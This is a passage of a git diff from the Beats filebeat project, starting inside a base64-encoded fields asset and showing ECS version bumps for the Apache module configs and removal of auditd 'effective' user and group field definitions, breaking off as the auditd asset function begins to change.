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" } diff --git a/filebeat/module/apache/access/config/access.yml b/filebeat/module/apache/access/config/access.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/apache/access/config/access.yml +++ b/filebeat/module/apache/access/config/access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/apache/error/config/error.yml b/filebeat/module/apache/error/config/error.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/apache/error/config/error.yml +++ b/filebeat/module/apache/error/config/error.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/auditd/_meta/fields.yml b/filebeat/module/auditd/_meta/fields.yml index e84497723a89..3f3384182868 100644 --- a/filebeat/module/auditd/_meta/fields.yml +++ b/filebeat/module/auditd/_meta/fields.yml @@ -36,26 +36,6 @@ description: > Name of the group. - - name: effective - type: group - description: Effective user information. - fields: - - name: id - type: keyword - description: Effective user ID. - - name: name - type: keyword - description: Effective user name. - - name: group - type: group - description: Effective group information. - fields: - - name: id - type: keyword - description: Effective group ID. - - name: name - type: keyword - description: Effective group name. - name: filesystem type: group diff --git a/filebeat/module/auditd/fields.go b/filebeat/module/auditd/fields.go index ab6f0d1ad932..e9daa6a4a4b1 100644 --- a/filebeat/module/auditd/fields.go +++ b/filebeat/module/auditd/fields.go @@ -32,5 +32,5 @@ func init() { // AssetAuditd returns asset data. // This is the base64 encoded gzipped contents of module/auditd. func AssetAuditd() string { - return 